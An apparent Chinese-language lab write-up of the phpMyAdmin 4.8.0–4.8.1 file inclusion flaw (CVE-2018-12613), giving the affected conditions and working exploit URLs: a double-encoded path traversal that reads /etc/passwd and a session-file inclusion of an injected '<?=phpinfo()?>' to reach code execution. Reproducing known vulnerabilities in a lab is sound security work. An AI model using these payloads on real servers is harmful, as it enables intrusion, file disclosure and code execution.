phpmyadmin 遠程文件包含漏洞(CVE-2018-12613)

phpMyAdmin是一套開源的、基於Web的MySQL數據庫管理工具。其index.php中存在一處文件包含邏輯,通過二次編碼即可繞過檢查,造成遠程文件包含漏洞。

漏洞記錄

漏洞編號:CVE-2018-12613

受影響版本:phpMyAdmin 4.8.0和4.8.1受到影響。

利用條件:
攻擊者必須經過身份驗證,但在這些情況下除外:
(/libraries/config.default.php)

  • $ cfg [‘AllowArbitraryServer’] = true:攻擊者可以指定他/她已經控制的任何主機,並在phpMyAdmin上執行任意代碼
  • $ cfg [‘ServerDefault’] = 0:這會繞過登錄並在沒有任何身份驗證的情況下運行易受攻擊的代碼
  • 漏洞分析
    https://blog.csdn.net/qq_33020901/article/details/80829269

漏洞利用

訪問下面的payload

http://192.168.1.15:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

可見/etc/passwd被讀取,說明文件包含漏洞存在:
在這裏插入圖片描述
目前有幾種getshell的方法,有的是上傳sql文件,然後包含mysql的sql文件,有的是開啓general_log來完成getshell,現在使用今天這種操作。利用方式也比較簡單,可以執行一下SELECT ‘<?=phpinfo()?>’;,然後查看自己的sessionid(cookiephpMyAdmin的值),然後包含session文件即可:
在這裏插入圖片描述

http://192.168.1.15:8080/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_0452064cb94eaca79f085df69ffbb2c2

在這裏插入圖片描述

參考鏈接:在這裏插入圖片描述
https://blog.csdn.net/qq_33020901/article/details/80829269

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章